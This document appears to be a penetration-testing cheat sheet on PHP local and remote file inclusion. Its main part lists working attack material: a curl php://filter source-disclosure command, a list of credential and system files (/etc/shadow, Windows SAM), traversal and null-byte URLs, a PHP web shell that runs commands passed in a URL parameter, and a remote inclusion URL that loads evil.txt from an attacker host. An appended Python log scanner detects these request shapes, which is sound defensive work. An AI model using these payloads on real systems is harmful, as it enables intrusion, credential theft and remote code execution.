A Penetration Testing Framework
There is a Python tool called fimap that automates the exploitation of LFI/RFI vulnerabilities found in PHP applications (like sqlmap, but for LFI): https://github.com/kurobeats/fimap
If a phpinfo() file is present, it's usually possible to get a shell. If you don't know the location of the phpinfo file, fimap can probe for it, or you could use a tool like OWASP DirBuster.
include("lang/".$_COOKIE['lang']);
include($_GET['page'].".php");
curl -s \
"http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
| grep -e '[^\ ]\{40,\}' | base64 -d
http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\repair\SAM
%WINDIR%\win.ini
%SYSTEMDRIVE%\boot.ini
%WINDIR%\Panther\sysprep.inf
%WINDIR%\system32\config\AppEvent.Evt
/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf
http://$ip/index.php?page=/etc/passwd
http://$ip/index.php?file=../../../../etc/passwd
http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
<?php echo shell_exec($_GET['cmd']);?>
For Remote File Inclusion, look for PHP code that passes unsanitized input to the PHP include function. The php.ini file must also be configured to allow remote files:
/etc/php5/cgi/php.ini - "allow_url_fopen" and "allow_url_include" both set to "on"
include($_REQUEST["file"].".php");
Remote File Inclusion
http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt
<?php echo shell_exec("ipconfig");?>
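Added example, not part of the original notes: a defender-side check that flags the request shapes listed above (php:// wrappers, plain and URL-encoded traversal, null-byte suffixes, absolute system paths, remote URLs in a parameter) in web access logs. The rule names, function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Rule names are hypothetical; patterns mirror the request shapes on this page.
RULES = [
    ("stream_wrapper", re.compile(r"^(php|data|expect|phar|zip)://", re.I)),
    ("remote_url", re.compile(r"^(https?|ftp)://", re.I)),
    ("traversal", re.compile(r"(^|[\\/])\.\.[\\/]")),
    ("null_byte", re.compile(r"\x00")),
    ("absolute_system_path", re.compile(r"^/(etc|proc|root|var)/")),
]
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated URL-encoding (e.g. %252F -> %2F -> /), bounded."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return sorted (param, rule) hits for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    hits = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.add((name, rule))
    return sorted(hits)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?file=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1450',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /addguestbook.php?name=a&comment=b&LANG=../../windows/system32/drivers/etc/hosts%00 HTTP/1.1" 200 930',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /addguestbook.php?name=a&comment=b&LANG=http://192.0.2.5/evil.txt HTTP/1.1" 200 77',
    '203.0.113.20 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:01:03 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1450',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect_line(line) or "clean", "<-", REQUEST.search(line).group(1))
```

The remote_url rule fires on any parameter that starts with a URL, so in production scope it to parameters known to reach include() to avoid alerting on legitimate redirect or callback fields.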